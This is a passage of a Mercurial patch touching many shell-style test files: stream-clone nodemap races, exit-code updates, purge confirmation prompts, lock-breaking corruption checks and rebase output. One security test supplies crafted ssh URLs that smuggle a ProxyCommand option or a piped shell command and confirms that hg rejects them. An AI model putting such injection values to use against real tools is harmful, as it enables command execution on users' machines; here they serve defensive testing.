+ adding [s] 00manifest.d (491 KB) (zstd !)
+ adding [s] 00changelog.d (360 KB) (no-zstd !)
+ adding [s] 00changelog.d (368 KB) (zstd !)
+ adding [s] 00manifest.i (313 KB)
adding [s] 00changelog.i (313 KB)
- adding [s] 00changelog.d (360 KB)
- adding [s] 00changelog-*.nd (118 KB) (glob)
$ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)'
00changelog-*.nd (glob)
00changelog.n
@@ -742,3 +841,212 @@
data-length: 121088
data-unused: 0
data-unused: 0.000%
+
+new data appened
+-----------------
+
+Other commit happening on the server during the stream clone
+
+setup the step-by-step stream cloning
+
+ $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1"
+ $ export HG_TEST_STREAM_WALKED_FILE_1
+ $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2"
+ $ export HG_TEST_STREAM_WALKED_FILE_2
+ $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3"
+ $ export HG_TEST_STREAM_WALKED_FILE_3
+ $ cat << EOF >> test-repo/.hg/hgrc
+ > [extensions]
+ > steps=$RUNTESTDIR/testlib/ext-stream-clone-steps.py
+ > EOF
+
+Check and record file state beforehand
+
+ $ f --size test-repo/.hg/store/00changelog*
+ test-repo/.hg/store/00changelog-*.nd: size=121088 (glob)
+ test-repo/.hg/store/00changelog.d: size=376891 (zstd !)
+ test-repo/.hg/store/00changelog.d: size=368890 (no-zstd !)
+ test-repo/.hg/store/00changelog.i: size=320384
+ test-repo/.hg/store/00changelog.n: size=70
+ $ hg -R test-repo debugnodemap --metadata | tee server-metadata.txt
+ uid: * (glob)
+ tip-rev: 5005
+ tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe
+ data-length: 121088
+ data-unused: 0
+ data-unused: 0.000%
+
+Prepare a commit
+
+ $ echo foo >> test-repo/foo
+ $ hg -R test-repo/ add test-repo/foo
+
+Do a mix of clone and commit at the same time so that the file listed on disk differ at actual transfer time.
+
+ $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-1 --debug 2>> clone-output | egrep '00(changelog|manifest)' >> clone-output; touch $HG_TEST_STREAM_WALKED_FILE_3) &
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1
+ $ hg -R test-repo/ commit -m foo
+ $ touch $HG_TEST_STREAM_WALKED_FILE_2
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3
+ $ cat clone-output
+ adding [s] 00manifest.n (70 bytes)
+ adding [s] 00manifest-*.nd (118 KB) (glob)
+ adding [s] 00changelog.n (70 bytes)
+ adding [s] 00changelog-*.nd (118 KB) (glob)
+ adding [s] 00manifest.d (452 KB) (no-zstd !)
+ adding [s] 00manifest.d (491 KB) (zstd !)
+ adding [s] 00changelog.d (360 KB) (no-zstd !)
+ adding [s] 00changelog.d (368 KB) (zstd !)
+ adding [s] 00manifest.i (313 KB)
+ adding [s] 00changelog.i (313 KB)
+
+Check the result state
+
+ $ f --size stream-clone-race-1/.hg/store/00changelog*
+ stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob)
+ stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd !)
+ stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd !)
+ stream-clone-race-1/.hg/store/00changelog.i: size=320384
+ stream-clone-race-1/.hg/store/00changelog.n: size=70
+
+ $ hg -R stream-clone-race-1 debugnodemap --metadata | tee client-metadata.txt
+ uid: * (glob)
+ tip-rev: 5005
+ tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe
+ data-length: 121088
+ data-unused: 0
+ data-unused: 0.000%
+
+We get a usable nodemap, so no rewrite would be needed and the metadata should be identical
+(ie: the following diff should be empty)
+
+This isn't the case for the `no-rust` `no-pure` implementation as it use a very minimal nodemap implementation that unconditionnaly rewrite the nodemap "all the time".
+
+#if no-rust no-pure
+ $ diff -u server-metadata.txt client-metadata.txt
+ --- server-metadata.txt * (glob)
+ +++ client-metadata.txt * (glob)
+ @@ -1,4 +1,4 @@
+ -uid: * (glob)
+ +uid: * (glob)
+ tip-rev: 5005
+ tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe
+ data-length: 121088
+ [1]
+#else
+ $ diff -u server-metadata.txt client-metadata.txt
+#endif
+
+
+Clean up after the test.
+
+ $ rm -f "$HG_TEST_STREAM_WALKED_FILE_1"
+ $ rm -f "$HG_TEST_STREAM_WALKED_FILE_2"
+ $ rm -f "$HG_TEST_STREAM_WALKED_FILE_3"
+
+full regeneration
+-----------------
+
+A full nodemap is generated
+
+(ideally this test would append enough data to make sure the nodemap data file
+get changed, however to make thing simpler we will force the regeneration for
+this test.
+
+Check the initial state
+
+ $ f --size test-repo/.hg/store/00changelog*
+ test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !)
+ test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !)
+ test-repo/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !)
+ test-repo/.hg/store/00changelog.d: size=376950 (zstd !)
+ test-repo/.hg/store/00changelog.d: size=368949 (no-zstd !)
+ test-repo/.hg/store/00changelog.i: size=320448
+ test-repo/.hg/store/00changelog.n: size=70
+ $ hg -R test-repo debugnodemap --metadata | tee server-metadata-2.txt
+ uid: * (glob)
+ tip-rev: 5006
+ tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b
+ data-length: 121344 (rust !)
+ data-length: 121344 (pure !)
+ data-length: 121152 (no-rust no-pure !)
+ data-unused: 192 (rust !)
+ data-unused: 192 (pure !)
+ data-unused: 0 (no-rust no-pure !)
+ data-unused: 0.158% (rust !)
+ data-unused: 0.158% (pure !)
+ data-unused: 0.000% (no-rust no-pure !)
+
+Performe the mix of clone and full refresh of the nodemap, so that the files
+(and filenames) are different between listing time and actual transfer time.
+
+ $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-2 --debug 2>> clone-output-2 | egrep '00(changelog|manifest)' >> clone-output-2; touch $HG_TEST_STREAM_WALKED_FILE_3) &
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1
+ $ rm test-repo/.hg/store/00changelog.n
+ $ rm test-repo/.hg/store/00changelog-*.nd
+ $ hg -R test-repo/ debugupdatecache
+ $ touch $HG_TEST_STREAM_WALKED_FILE_2
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3
+ $ cat clone-output-2
+ adding [s] 00manifest.n (70 bytes)
+ adding [s] 00manifest-*.nd (118 KB) (glob)
+ adding [s] 00changelog.n (70 bytes)
+ adding [s] 00changelog-*.nd (118 KB) (glob)
+ adding [s] 00manifest.d (492 KB) (zstd !)
+ adding [s] 00manifest.d (452 KB) (no-zstd !)
+ adding [s] 00changelog.d (360 KB) (no-zstd !)
+ adding [s] 00changelog.d (368 KB) (zstd !)
+ adding [s] 00manifest.i (313 KB)
+ adding [s] 00changelog.i (313 KB)
+
+Check the result.
+
+ $ f --size stream-clone-race-2/.hg/store/00changelog*
+ stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !)
+ stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !)
+ stream-clone-race-2/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !)
+ stream-clone-race-2/.hg/store/00changelog.d: size=376950 (zstd !)
+ stream-clone-race-2/.hg/store/00changelog.d: size=368949 (no-zstd !)
+ stream-clone-race-2/.hg/store/00changelog.i: size=320448
+ stream-clone-race-2/.hg/store/00changelog.n: size=70
+
+ $ hg -R stream-clone-race-2 debugnodemap --metadata | tee client-metadata-2.txt
+ uid: * (glob)
+ tip-rev: 5006
+ tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b
+ data-length: 121344 (rust !)
+ data-unused: 192 (rust !)
+ data-unused: 0.158% (rust !)
+ data-length: 121152 (no-rust no-pure !)
+ data-unused: 0 (no-rust no-pure !)
+ data-unused: 0.000% (no-rust no-pure !)
+ data-length: 121344 (pure !)
+ data-unused: 192 (pure !)
+ data-unused: 0.158% (pure !)
+
+We get a usable nodemap, so no rewrite would be needed and the metadata should be identical
+(ie: the following diff should be empty)
+
+This isn't the case for the `no-rust` `no-pure` implementation as it use a very minimal nodemap implementation that unconditionnaly rewrite the nodemap "all the time".
+
+#if no-rust no-pure
+ $ diff -u server-metadata-2.txt client-metadata-2.txt
+ --- server-metadata-2.txt * (glob)
+ +++ client-metadata-2.txt * (glob)
+ @@ -1,4 +1,4 @@
+ -uid: * (glob)
+ +uid: * (glob)
+ tip-rev: 5006
+ tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b
+ data-length: 121152
+ [1]
+#else
+ $ diff -u server-metadata-2.txt client-metadata-2.txt
+#endif
+
+Clean up after the test
+
+ $ rm -f $HG_TEST_STREAM_WALKED_FILE_1
+ $ rm -f $HG_TEST_STREAM_WALKED_FILE_2
+ $ rm -f $HG_TEST_STREAM_WALKED_FILE_3
+
--- a/tests/test-phabricator.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-phabricator.t Tue Apr 20 11:01:06 2021 -0400
@@ -48,7 +48,7 @@
options:
(use 'hg debugcallconduit -h' to show more help)
- [255]
+ [10]
$ hg phabread
abort: empty DREVSPEC set
[255]
--- a/tests/test-phases.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-phases.t Tue Apr 20 11:01:06 2021 -0400
@@ -757,7 +757,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ cp .hg/store/phaseroots.pending.saved .hg/store/phaseroots.pending
(check (in)visibility of phaseroot while transaction running in repo)
@@ -780,7 +780,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
Check that pretxnclose-phase hook can control phase movement
@@ -854,12 +854,12 @@
transaction abort!
rollback completed
abort: pretxnclose-phase.nopublish_D hook exited with status 1
- [255]
+ [40]
$ hg phase --public a603bfb5a83e
transaction abort!
rollback completed
abort: pretxnclose-phase.nopublish_D hook exited with status 1
- [255]
+ [40]
$ hg phase --draft 17a481b3bccb
test-debug-phase: move rev 3: 2 -> 1
test-debug-phase: move rev 4: 2 -> 1
@@ -871,7 +871,7 @@
transaction abort!
rollback completed
abort: pretxnclose-phase.nopublish_D hook exited with status 1
- [255]
+ [40]
$ cd ..
@@ -886,6 +886,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -913,6 +915,8 @@
fncache
generaldelta
internal-phase
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-pull-bundle.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-pull-bundle.t Tue Apr 20 11:01:06 2021 -0400
@@ -185,7 +185,7 @@
adding changesets
adding manifests
adding file changes
- abort: 00changelog.i@66f7d451a68b: no node
+ abort: 00changelog.i@66f7d451a68b85ed82ff5fcc254daf50c74144bd: no node
[50]
$ cd ..
$ killdaemons.py
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-pull-network.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,137 @@
+#require serve
+
+#testcases sshv1 sshv2
+
+#if sshv2
+ $ cat >> $HGRCPATH << EOF
+ > [experimental]
+ > sshpeer.advertise-v2 = true
+ > sshserver.support-v2 = true
+ > EOF
+#endif
+
+ $ hg init test
+ $ cd test
+
+ $ echo foo>foo
+ $ hg addremove
+ adding foo
+ $ hg commit -m 1
+
+ $ hg verify
+ checking changesets
+ checking manifests
+ crosschecking files in changesets and manifests
+ checking files
+ checked 1 changesets with 1 changes to 1 files
+
+ $ hg serve -p $HGPORT -d --pid-file=hg.pid
+ $ cat hg.pid >> $DAEMON_PIDS
+ $ cd ..
+
+ $ hg clone --pull http://foo:bar@localhost:$HGPORT/ copy
+ requesting all changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 340e38bdcde4
+ updating to branch default
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+ $ cd copy
+ $ hg verify
+ checking changesets
+ checking manifests
+ crosschecking files in changesets and manifests
+ checking files
+ checked 1 changesets with 1 changes to 1 files
+
+ $ hg co
+ 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ cat foo
+ foo
+
+ $ hg manifest --debug
+ 2ed2a3912a0b24502043eae84ee4b279c18b90dd 644 foo
+
+ $ hg pull
+ pulling from http://foo@localhost:$HGPORT/
+ searching for changes
+ no changes found
+
+ $ hg rollback --dry-run --verbose
+ repository tip rolled back to revision -1 (undo pull: http://foo:***@localhost:$HGPORT/)
+
+Test pull of non-existing 20 character revision specification, making sure plain ascii identifiers
+not are encoded like a node:
+
+ $ hg pull -r 'xxxxxxxxxxxxxxxxxxxy'
+ pulling from http://foo@localhost:$HGPORT/
+ abort: unknown revision 'xxxxxxxxxxxxxxxxxxxy'
+ [255]
+ $ hg pull -r 'xxxxxxxxxxxxxxxxxx y'
+ pulling from http://foo@localhost:$HGPORT/
+ abort: unknown revision 'xxxxxxxxxxxxxxxxxx y'
+ [255]
+
+Test pull of working copy revision
+ $ hg pull -r 'ffffffffffff'
+ pulling from http://foo@localhost:$HGPORT/
+ abort: unknown revision 'ffffffffffff'
+ [255]
+
+Test 'file:' uri handling:
+
+ $ hg pull -q file://../test-does-not-exist
+ abort: file:// URLs can only refer to localhost
+ [255]
+
+ $ hg pull -q file://../test
+ abort: file:// URLs can only refer to localhost
+ [255]
+
+MSYS changes 'file:' into 'file;'
+
+#if no-msys
+ $ hg pull -q file:../test # no-msys
+#endif
+
+It's tricky to make file:// URLs working on every platform with
+regular shell commands.
+
+ $ URL=`"$PYTHON" -c "from __future__ import print_function; import os; print('file://foobar' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test')"`
+ $ hg pull -q "$URL"
+ abort: file:// URLs can only refer to localhost
+ [255]
+
+ $ URL=`"$PYTHON" -c "from __future__ import print_function; import os; print('file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test')"`
+ $ hg pull -q "$URL"
+
+SEC: check for unsafe ssh url
+
+ $ cat >> $HGRCPATH << EOF
+ > [ui]
+ > ssh = sh -c "read l; read l; read l"
+ > EOF
+
+ $ hg pull 'ssh://-oProxyCommand=touch${IFS}owned/path'
+ pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
+ abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
+ [255]
+ $ hg pull 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
+ pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
+ abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
+ [255]
+ $ hg pull 'ssh://fakehost|touch${IFS}owned/path'
+ pulling from ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path
+ abort: no suitable response from remote hg
+ [255]
+ $ hg --config ui.timestamp-output=true pull 'ssh://fakehost%7Ctouch%20owned/path'
+ \[20[2-9][0-9]-[01][0-9]-[0-3][0-9]T[0-5][0-9]:[0-5][0-9]:[0-5][0-9]\.[0-9][0-9][0-9][0-9][0-9][0-9]\] pulling from ssh://fakehost%7Ctouch%20owned/path (re)
+ \[20[2-9][0-9]-[01][0-9]-[0-3][0-9]T[0-5][0-9]:[0-5][0-9]:[0-5][0-9]\.[0-9][0-9][0-9][0-9][0-9][0-9]\] abort: no suitable response from remote hg (re)
+ [255]
+
+ $ [ ! -f owned ] || echo 'you got owned'
+
+ $ cd ..
--- a/tests/test-pull-update.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-pull-update.t Tue Apr 20 11:01:06 2021 -0400
@@ -246,3 +246,25 @@
active-before-pull 3:483b76ad4309
$ cd ..
+
+Issue622: hg init && hg pull -u URL doesn't checkout default branch
+
+ $ hg init test
+ $ cd test
+ $ echo foo>foo
+ $ hg addremove
+ adding foo
+ $ hg commit -m 1
+ $ cd ..
+
+ $ hg init empty
+ $ cd empty
+ $ hg pull -u ../test
+ pulling from ../test
+ requesting all changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 340e38bdcde4
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
--- a/tests/test-pull.t Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,152 +0,0 @@
-#require serve
-
-#testcases sshv1 sshv2
-
-#if sshv2
- $ cat >> $HGRCPATH << EOF
- > [experimental]
- > sshpeer.advertise-v2 = true
- > sshserver.support-v2 = true
- > EOF
-#endif
-
- $ hg init test
- $ cd test
-
- $ echo foo>foo
- $ hg addremove
- adding foo
- $ hg commit -m 1
-
- $ hg verify
- checking changesets
- checking manifests
- crosschecking files in changesets and manifests
- checking files
- checked 1 changesets with 1 changes to 1 files
-
- $ hg serve -p $HGPORT -d --pid-file=hg.pid
- $ cat hg.pid >> $DAEMON_PIDS
- $ cd ..
-
- $ hg clone --pull http://foo:bar@localhost:$HGPORT/ copy
- requesting all changes
- adding changesets
- adding manifests
- adding file changes
- added 1 changesets with 1 changes to 1 files
- new changesets 340e38bdcde4
- updating to branch default
- 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
-
- $ cd copy
- $ hg verify
- checking changesets
- checking manifests
- crosschecking files in changesets and manifests
- checking files
- checked 1 changesets with 1 changes to 1 files
-
- $ hg co
- 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
- $ cat foo
- foo
-
- $ hg manifest --debug
- 2ed2a3912a0b24502043eae84ee4b279c18b90dd 644 foo
-
- $ hg pull
- pulling from http://foo@localhost:$HGPORT/
- searching for changes
- no changes found
-
- $ hg rollback --dry-run --verbose
- repository tip rolled back to revision -1 (undo pull: http://foo:***@localhost:$HGPORT/)
-
-Test pull of non-existing 20 character revision specification, making sure plain ascii identifiers
-not are encoded like a node:
-
- $ hg pull -r 'xxxxxxxxxxxxxxxxxxxy'
- pulling from http://foo@localhost:$HGPORT/
- abort: unknown revision 'xxxxxxxxxxxxxxxxxxxy'
- [255]
- $ hg pull -r 'xxxxxxxxxxxxxxxxxx y'
- pulling from http://foo@localhost:$HGPORT/
- abort: unknown revision 'xxxxxxxxxxxxxxxxxx y'
- [255]
-
-Test pull of working copy revision
- $ hg pull -r 'ffffffffffff'
- pulling from http://foo@localhost:$HGPORT/
- abort: unknown revision 'ffffffffffff'
- [255]
-
-Issue622: hg init && hg pull -u URL doesn't checkout default branch
-
- $ cd ..
- $ hg init empty
- $ cd empty
- $ hg pull -u ../test
- pulling from ../test
- requesting all changes
- adding changesets
- adding manifests
- adding file changes
- added 1 changesets with 1 changes to 1 files
- new changesets 340e38bdcde4
- 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
-
-Test 'file:' uri handling:
-
- $ hg pull -q file://../test-does-not-exist
- abort: file:// URLs can only refer to localhost
- [255]
-
- $ hg pull -q file://../test
- abort: file:// URLs can only refer to localhost
- [255]
-
-MSYS changes 'file:' into 'file;'
-
-#if no-msys
- $ hg pull -q file:../test # no-msys
-#endif
-
-It's tricky to make file:// URLs working on every platform with
-regular shell commands.
-
- $ URL=`"$PYTHON" -c "from __future__ import print_function; import os; print('file://foobar' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test')"`
- $ hg pull -q "$URL"
- abort: file:// URLs can only refer to localhost
- [255]
-
- $ URL=`"$PYTHON" -c "from __future__ import print_function; import os; print('file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test')"`
- $ hg pull -q "$URL"
-
-SEC: check for unsafe ssh url
-
- $ cat >> $HGRCPATH << EOF
- > [ui]
- > ssh = sh -c "read l; read l; read l"
- > EOF
-
- $ hg pull 'ssh://-oProxyCommand=touch${IFS}owned/path'
- pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
- abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
- [255]
- $ hg pull 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
- pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
- abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
- [255]
- $ hg pull 'ssh://fakehost|touch${IFS}owned/path'
- pulling from ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path
- abort: no suitable response from remote hg
- [255]
- $ hg --config ui.timestamp-output=true pull 'ssh://fakehost%7Ctouch%20owned/path'
- \[20[2-9][0-9]-[01][0-9]-[0-3][0-9]T[0-5][0-9]:[0-5][0-9]:[0-5][0-9]\.[0-9][0-9][0-9][0-9][0-9][0-9]\] pulling from ssh://fakehost%7Ctouch%20owned/path (re)
- \[20[2-9][0-9]-[01][0-9]-[0-3][0-9]T[0-5][0-9]:[0-5][0-9]:[0-5][0-9]\.[0-9][0-9][0-9][0-9][0-9][0-9]\] abort: no suitable response from remote hg (re)
- [255]
-
- $ [ ! -f owned ] || echo 'you got owned'
-
- $ cd ..
--- a/tests/test-purge.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-purge.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,8 +1,3 @@
- $ cat <<EOF >> $HGRCPATH
- > [extensions]
- > purge =
- > EOF
-
init
$ hg init t
@@ -18,11 +13,35 @@
$ echo 'ignored' > .hgignore
$ hg ci -qAmr3 -d'2 0'
+purge without the extension
+
+ $ hg st
+ $ touch foo
+ $ hg purge
+ permanently delete 1 unkown files? (yN) n
+ abort: removal cancelled
+ [250]
+ $ hg st
+ ? foo
+ $ hg purge --no-confirm
+ $ hg st
+
+now enabling the extension
+
+ $ cat <<EOF >> $HGRCPATH
+ > [extensions]
+ > purge =
+ > EOF
+
delete an empty directory
$ mkdir empty_dir
$ hg purge -p -v
empty_dir
+ $ hg purge --confirm
+ permanently delete at least 1 empty directories? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v
removing directory empty_dir
$ ls -A
@@ -62,6 +81,10 @@
$ hg purge -p
untracked_file
untracked_file_readonly
+ $ hg purge --confirm
+ permanently delete 2 unkown files? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v
removing file untracked_file
removing file untracked_file_readonly
@@ -121,6 +144,10 @@
$ cd directory
$ hg purge -p ../untracked_directory
untracked_directory/nested_directory
+ $ hg purge --confirm
+ permanently delete 1 unkown files? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v ../untracked_directory
removing directory untracked_directory/nested_directory
removing directory untracked_directory
@@ -138,6 +165,7 @@
$ touch ignored
$ hg purge -p
+ $ hg purge --confirm
$ hg purge -v
$ touch untracked_file
$ ls
@@ -147,6 +175,10 @@
untracked_file
$ hg purge -p -i
ignored
+ $ hg purge --confirm -i
+ permanently delete 1 ignored files? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v -i
removing file ignored
$ ls -A
@@ -159,6 +191,10 @@
$ hg purge -p --all
ignored
untracked_file
+ $ hg purge --confirm --all
+ permanently delete 1 unkown and 1 ignored files? (yN) n
+ abort: removal cancelled
+ [250]
$ hg purge -v --all
removing file ignored
removing file untracked_file
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-racy-mutations.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,102 @@
+#testcases skip-detection fail-if-detected
+
+Test situations that "should" only be reproducible:
+- on networked filesystems, or
+- user using `hg debuglocks` to eliminate the lock file, or
+- something (that doesn't respect the lock file) writing to the .hg directory
+while we're running
+
+ $ hg init a
+ $ cd a
+
+ $ cat > "$TESTTMP/waitlock_editor.sh" <<EOF
+ > [ -n "\${WAITLOCK_ANNOUNCE:-}" ] && touch "\${WAITLOCK_ANNOUNCE}"
+ > f="\${WAITLOCK_FILE}"
+ > start=\`date +%s\`
+ > timeout=5
+ > while [ \\( ! -f \$f \\) -a \\( ! -L \$f \\) ]; do
+ > now=\`date +%s\`
+ > if [ "\`expr \$now - \$start\`" -gt \$timeout ]; then
+ > echo "timeout: \$f was not created in \$timeout seconds (it is now \$(date +%s))"
+ > exit 1
+ > fi
+ > sleep 0.1
+ > done
+ > if [ \$# -gt 1 ]; then
+ > cat "\$@"
+ > fi
+ > EOF
+ $ chmod +x "$TESTTMP/waitlock_editor.sh"
+
+Things behave differently if we don't already have a 00changelog.i file when
+this all starts, so let's make one.
+
+ $ echo r0 > r0
+ $ hg commit -qAm 'r0'
+
+Start an hg commit that will take a while
+ $ EDITOR_STARTED="$(pwd)/.editor_started"
+ $ MISCHIEF_MANAGED="$(pwd)/.mischief_managed"
+ $ JOBS_FINISHED="$(pwd)/.jobs_finished"
+
+#if fail-if-detected
+ $ cat >> .hg/hgrc << EOF
+ > [debug]
+ > revlog.verifyposition.changelog = fail
+ > EOF
+#endif
+
+ $ echo foo > foo
+ $ (WAITLOCK_ANNOUNCE="${EDITOR_STARTED}" \
+ > WAITLOCK_FILE="${MISCHIEF_MANAGED}" \
+ > HGEDITOR="$TESTTMP/waitlock_editor.sh" \
+ > hg commit -qAm 'r1 (foo)' --edit foo > .foo_commit_out 2>&1 ; touch "${JOBS_FINISHED}") &
+
+Wait for the "editor" to actually start
+ $ WAITLOCK_FILE="${EDITOR_STARTED}" "$TESTTMP/waitlock_editor.sh"
+
+Break the locks, and make another commit.
+ $ hg debuglocks -LW
+ $ echo bar > bar
+ $ hg commit -qAm 'r2 (bar)' bar
+ $ hg debugrevlogindex -c
+ rev linkrev nodeid p1 p2
+ 0 0 222799e2f90b 000000000000 000000000000
+ 1 1 6f124f6007a0 222799e2f90b 000000000000
+
+Awaken the editor from that first commit
+ $ touch "${MISCHIEF_MANAGED}"
+And wait for it to finish
+ $ WAITLOCK_FILE="${JOBS_FINISHED}" "$TESTTMP/waitlock_editor.sh"
+
+#if skip-detection
+(Ensure there was no output)
+ $ cat .foo_commit_out
+And observe a corrupted repository -- rev 2's linkrev is 1, which should never
+happen for the changelog (the linkrev should always refer to itself).
+ $ hg debugrevlogindex -c
+ rev linkrev nodeid p1 p2
+ 0 0 222799e2f90b 000000000000 000000000000
+ 1 1 6f124f6007a0 222799e2f90b 000000000000
+ 2 1 ac80e6205bb2 222799e2f90b 000000000000
+#endif
+
+#if fail-if-detected
+ $ cat .foo_commit_out
+ transaction abort!
+ rollback completed
+ note: commit message saved in .hg/last-message.txt
+ note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
+ abort: 00changelog.i: file cursor at position 249, expected 121
+And no corruption in the changelog.
+ $ hg debugrevlogindex -c
+ rev linkrev nodeid p1 p2
+ 0 0 222799e2f90b 000000000000 000000000000
+ 1 1 6f124f6007a0 222799e2f90b 000000000000
+And, because of transactions, there's none in the manifestlog either.
+ $ hg debugrevlogindex -m
+ rev linkrev nodeid p1 p2
+ 0 0 7b7020262a56 000000000000 000000000000
+ 1 1 ad3fe36d86d9 7b7020262a56 000000000000
+#endif
+
--- a/tests/test-rebase-abort.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-abort.t Tue Apr 20 11:01:06 2021 -0400
@@ -95,6 +95,7 @@
ancestor path: common (node de0a666fdd9c1a0b0698b90d85064d8bd34f74b6)
other path: common (node 2f6411de53677f6f1048fef5bf888d67a342e0a5)
extra: ancestorlinknode = 3163e20567cc93074fbb7a53c8b93312e59dbf2c
+ extra: merged = yes
$ hg resolve -l
U common
--- a/tests/test-rebase-collapse.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-collapse.t Tue Apr 20 11:01:06 2021 -0400
@@ -134,7 +134,7 @@
$ hg rebase --base B -m 'custom message'
abort: message can only be specified with collapse
- [255]
+ [10]
$ cat > $TESTTMP/checkeditform.sh <<EOF
> env | grep HGEDITFORM
@@ -180,7 +180,7 @@
$ hg rebase -s C --dest H --collapse
abort: unable to collapse on top of 3, there is more than one external parent: 1, 6
- [255]
+ [20]
Rebase and collapse - E onto H:
@@ -386,7 +386,7 @@
BROKEN: should be allowed
$ hg rebase --collapse -r 'B+D+F' -d G
abort: unable to collapse on top of 2, there is more than one external parent: 3, 5
- [255]
+ [20]
$ cd ..
@@ -404,7 +404,7 @@
$ hg rebase --collapse -d H -s 'B+F'
abort: unable to collapse on top of 5, there is more than one external parent: 1, 3
- [255]
+ [20]
$ cd ..
With internal merge:
@@ -484,7 +484,7 @@
$ hg rebase --keepbranches --collapse -s 1 -d 3
abort: cannot collapse multiple named branches
- [255]
+ [10]
$ cd ..
--- a/tests/test-rebase-conflicts.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-conflicts.t Tue Apr 20 11:01:06 2021 -0400
@@ -318,10 +318,10 @@
bundle2-input-part: total payload size 1686
bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
bundle2-input-part: total payload size 74
- truncating cache/rbc-revs-v1 to 56
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
bundle2-input-bundle: 3 parts total
+ truncating cache/rbc-revs-v1 to 72
added 2 changesets with 2 changes to 1 files
updating the branch cache
invalid branch cache (served): tip differs
--- a/tests/test-rebase-dest.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-dest.t Tue Apr 20 11:01:06 2021 -0400
